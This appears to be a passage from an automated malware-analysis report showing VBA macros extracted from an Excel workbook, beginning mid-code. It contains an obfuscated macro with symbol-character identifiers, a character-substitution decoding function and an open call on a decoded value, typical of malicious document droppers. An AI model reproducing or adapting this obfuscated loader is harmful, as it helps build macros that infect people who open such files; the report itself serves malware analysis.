©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Close
End If
¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«.Open (©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»)
End Sub

    Public Function ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ)
        ¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§² = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ)
            ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º = InStr(¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼, Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1))
            If ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º > 0 Then
                «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª = Mid(´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§², ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º, 1)
                ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª
            Else
                ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1)
            End If
        Next
        ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢ = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·
    End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.